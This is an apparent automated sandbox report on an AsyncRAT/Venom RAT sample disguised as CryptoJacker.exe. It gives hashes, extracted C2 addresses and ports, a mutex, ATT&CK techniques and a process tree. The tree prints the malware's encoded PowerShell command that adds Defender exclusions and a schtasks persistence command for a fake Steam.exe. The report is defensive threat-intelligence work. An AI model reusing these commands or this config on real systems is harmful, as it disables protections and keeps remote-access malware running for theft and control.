asyncrat | 9e7c3d6f3fe04cb70a771849581faba1e3c9f913aecc4aa72426741fdf71dee8

Analysis

max time kernel
150s
max time network
138s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 13:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CryptoJacker.exe
Size

10.6MB
MD5

d8a30735aa4702e200ed432d223c3ad8
SHA1

fa144148c226a9d08e1d1179cfa60597d4f08cac
SHA256

24aeb855ead570407cef3835b4e5ac516e9ec8dd1d0105662727e4f12082b3d2
SHA512

cbc030dd159172c2448554393caeb8b0c910d302dec1edc3a719c47be01bb90a4c243d1d15f0cbfebaf0e016cebec7e5c173c4d5cdd27ffdb557716f2071014a
SSDEEP

196608:g0Kn9PL3A8tKCn4bwcfAjSNgeQ4ZhseG0j73cQIqW3yiFoNWpPm4Q:/KnZQ4n4Z5Ve0PJIf3rFXdm4Q

Score

10^/10

asyncrat default execution pyinstaller rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

10.0.2.15:9090

10.0.2.15:52033

147.185.221.19:9090

147.185.221.19:52033

Mutex

yigdzohbebyxyvvzbc

Attributes

delay
1
install
true
install_file
Steam.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Async RAT payload 1 IoCs
rat

Processes:

resource yara_rule

\Users\Admin\AppData\Local\Temp\Main.exe family_asyncrat
Executes dropped EXE 4 IoCs

Processes:

crypto_jacker.exeMain.execrypto_jacker.exeSteam.exe

pid process

2968 crypto_jacker.exe
2600 Main.exe
2644 crypto_jacker.exe
1956 Steam.exe
Loads dropped DLL 5 IoCs

Processes:

CryptoJacker.execrypto_jacker.execrypto_jacker.exe

pid process

1932 CryptoJacker.exe
2564
1932 CryptoJacker.exe
2968 crypto_jacker.exe
2644 crypto_jacker.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2184 powershell.exe
Detects Pyinstaller 1 IoCs
pyinstaller

Processes:

resource yara_rule

\Users\Admin\AppData\Local\Temp\crypto_jacker.exe pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1032 timeout.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

1976 schtasks.exe

resource	yara_rule
\Users\Admin\AppData\Local\Temp\Main.exe	family_asyncrat

pid	process
2968	crypto_jacker.exe
2600	Main.exe
2644	crypto_jacker.exe
1956	Steam.exe

pid	process
1932	CryptoJacker.exe
2564
1932	CryptoJacker.exe
2968	crypto_jacker.exe
2644	crypto_jacker.exe

resource	yara_rule
\Users\Admin\AppData\Local\Temp\crypto_jacker.exe	pyinstaller

pid	process
1032	timeout.exe

pid	process
1976	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeMain.exeSteam.exe

pid	process
2184	powershell.exe
2600	Main.exe
2600	Main.exe
2600	Main.exe
2600	Main.exe
2600	Main.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe
1956	Steam.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeMain.exeSteam.exe

description pid process

Token: SeDebugPrivilege 2184 powershell.exe
Token: SeDebugPrivilege 2600 Main.exe
Token: SeDebugPrivilege 1956 Steam.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Steam.exe

pid process

1956 Steam.exe

description	pid	process
Token: SeDebugPrivilege	2184	powershell.exe
Token: SeDebugPrivilege	2600	Main.exe
Token: SeDebugPrivilege	1956	Steam.exe

pid	process
1956	Steam.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

CryptoJacker.execrypto_jacker.exeMain.execmd.execmd.exe

description	pid	process	target process
PID 1932 wrote to memory of 2184	1932	CryptoJacker.exe	powershell.exe
PID 1932 wrote to memory of 2184	1932	CryptoJacker.exe	powershell.exe
PID 1932 wrote to memory of 2184	1932	CryptoJacker.exe	powershell.exe
PID 1932 wrote to memory of 2184	1932	CryptoJacker.exe	powershell.exe
PID 1932 wrote to memory of 2968	1932	CryptoJacker.exe	crypto_jacker.exe
PID 1932 wrote to memory of 2968	1932	CryptoJacker.exe	crypto_jacker.exe
PID 1932 wrote to memory of 2968	1932	CryptoJacker.exe	crypto_jacker.exe
PID 1932 wrote to memory of 2968	1932	CryptoJacker.exe	crypto_jacker.exe
PID 1932 wrote to memory of 2600	1932	CryptoJacker.exe	Main.exe
PID 1932 wrote to memory of 2600	1932	CryptoJacker.exe	Main.exe
PID 1932 wrote to memory of 2600	1932	CryptoJacker.exe	Main.exe
PID 1932 wrote to memory of 2600	1932	CryptoJacker.exe	Main.exe
PID 2968 wrote to memory of 2644	2968	crypto_jacker.exe	crypto_jacker.exe
PID 2968 wrote to memory of 2644	2968	crypto_jacker.exe	crypto_jacker.exe
PID 2968 wrote to memory of 2644	2968	crypto_jacker.exe	crypto_jacker.exe
PID 2600 wrote to memory of 2572	2600	Main.exe	cmd.exe
PID 2600 wrote to memory of 2572	2600	Main.exe	cmd.exe
PID 2600 wrote to memory of 2572	2600	Main.exe	cmd.exe
PID 2600 wrote to memory of 1988	2600	Main.exe	cmd.exe
PID 2600 wrote to memory of 1988	2600	Main.exe	cmd.exe
PID 2600 wrote to memory of 1988	2600	Main.exe	cmd.exe
PID 1988 wrote to memory of 1032	1988	cmd.exe	timeout.exe
PID 1988 wrote to memory of 1032	1988	cmd.exe	timeout.exe
PID 1988 wrote to memory of 1032	1988	cmd.exe	timeout.exe
PID 2572 wrote to memory of 1976	2572	cmd.exe	schtasks.exe
PID 2572 wrote to memory of 1976	2572	cmd.exe	schtasks.exe
PID 2572 wrote to memory of 1976	2572	cmd.exe	schtasks.exe
PID 1988 wrote to memory of 1956	1988	cmd.exe	Steam.exe
PID 1988 wrote to memory of 1956	1988	cmd.exe	Steam.exe
PID 1988 wrote to memory of 1956	1988	cmd.exe	Steam.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe
"C:\Users\Admin\AppData\Local\Temp\CryptoJacker.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAcABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAcgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAbQB6ACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
"C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2968

C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
"C:\Users\Admin\AppData\Local\Temp\crypto_jacker.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2644

C:\Users\Admin\AppData\Local\Temp\Main.exe
"C:\Users\Admin\AppData\Local\Temp\Main.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2572

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
4⤵
- Scheduled Task/Job: Scheduled Task
PID:1976

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2617.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:1988

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:1032

C:\Users\Admin\AppData\Roaming\Steam.exe
"C:\Users\Admin\AppData\Roaming\Steam.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1956

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI29682\python311.dll
Filesize
5.5MB

MD5
e2bd5ae53427f193b42d64b8e9bf1943

SHA1
7c317aad8e2b24c08d3b8b3fba16dd537411727f

SHA256
c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400

SHA512
ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2617.tmp.bat
Filesize
149B

MD5
1a5c4a8386b3596e72460dc52b408da9

SHA1
c385dcc0c2d0ff777d8361a6cfad24942645dbbb

SHA256
15fcaee33b841888872824ad5e0e45381f7d0231d17247f3293aaf8f56ec8f6e

SHA512
781b6ffe15cd44d69c466b815e933331edc31eded149d647eaabeac4a2c33ec8be30009793d45306c9ae04be9dc11afa046a1e825514aa2d03d40f801a533b45

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
\Users\Admin\AppData\Local\Temp\Main.exe
Filesize
74KB

MD5
b8ccfc163e2d56a73b6fd7387a45e6eb

SHA1
f81a368c275574fa808a92d29c5e0b37e01162ce

SHA256
8386fa61b6c5f873c692fbd3b394851ec714e5c852898ef6f622035e4d3d5e84

SHA512
8ea7d2ee4fa1f737e7c77dda98963a1c9d3a3276ab0d0d327b5df41682da91996e2e17cbfdb99ddf9399a819c6ec9cdde18b6a8fe6cf221960103b34acb21faf

Download Submit
\Users\Admin\AppData\Local\Temp\crypto_jacker.exe
Filesize
10.5MB

MD5
ccb8c058314c049211a16c6291182261

SHA1
f47c9a4cb2b48e5ede2d4a4bd934c2cd98cd9b90

SHA256
30da0a0cf38714ea7b3c3f1b6c30f810912e7cae78a053511ba1b3e03c9b6499

SHA512
c878cf36309e91450791a6e4e0c3163b1226bbfcb6fdcdb3d421f228ed5c65771d3982f7f6ca24d5946f41aed5447de446f80fd92abeee6231d79f4860c76c71

Download Submit
memory/1956-88-0x0000000001190000-0x00000000011A8000-memory.dmp

Filesize
96KB

Download
memory/2600-36-0x0000000001210000-0x0000000001228000-memory.dmp

Filesize
96KB

Download